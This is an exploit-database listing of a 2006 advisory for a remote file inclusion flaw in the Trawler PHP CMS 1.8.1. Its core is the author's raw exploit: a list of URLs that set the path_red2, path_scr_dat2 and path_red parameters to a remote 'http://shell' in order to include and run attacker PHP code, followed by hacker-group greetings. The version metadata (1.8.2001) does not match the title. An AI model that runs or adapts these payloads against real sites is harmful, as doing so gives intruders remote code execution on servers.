header-logo
Suggest Exploit
vendor:
Trawler
by:
k1tk4t
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Trawler
Affected Version From: 1.8.2001
Affected Version To: 1.8.2001
Patch Exists: NO
Related CWE: N/A
CPE: a:harald_kampen:trawler
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

trawler <= 1.8.1 Remote File Inclusion

A vulnerability exists in trawler version 1.8.1 which allows an attacker to include remote files via the 'path_red2' and 'path_scr_dat2' parameters in multiple scripts. This can be exploited to execute arbitrary PHP code by including a malicious file from a remote location.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in a file inclusion operation.
Source

Exploit-DB raw data:

#########################################################################
# trawler <= 1.8.1  Remote File Inclusion
# Download Source : http://harald-kampen.de/trawler1.8.1.zip
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org @irc.dal.net
########################################################################
exploit;
http://localhost/_msdazu_pdata/redaktion/artikel/up/index.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/addtort.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/colorpik2.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/colorpik3.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/extras_menu.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/farbpalette.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/lese_inc.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/newfile.php?path_red2=http://shell
http://localhost/_msdazu_share/share/insert1.php?path_scr_dat2=http://shell
http://localhost/_msdazu_share/extras/downloads/index.php?path_red=http://shell
and many more bug in this packet trawler ver 1.8.1 <-- :( this packet is
openbug
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]

# milw0rm.com [2006-10-21]

Navigation

Suggest Exploit

Services By CQR